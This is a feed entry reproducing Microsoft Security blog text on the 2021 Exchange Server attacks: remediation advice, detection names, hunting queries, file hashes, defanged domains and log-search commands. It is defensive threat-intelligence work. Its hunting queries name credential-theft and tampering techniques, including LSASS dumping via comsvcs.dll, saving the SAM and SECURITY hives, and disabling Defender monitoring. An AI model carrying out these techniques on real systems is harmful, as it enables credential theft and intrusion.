This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17. Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise, even after patches have been applied. 
While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. 
If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. 
For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * 
[Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * 
[Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. 
Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where 
InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. 
The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web 
shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * 
a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-25T21:21:07", "type": "mssecure", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. 
This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. 
It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. 
Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. 
One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. 
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script that runs the HAFNIUM IOC checks described below; it addresses the performance and memory concerns of running the manual commands against large log sets. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions 
were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is a PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. 
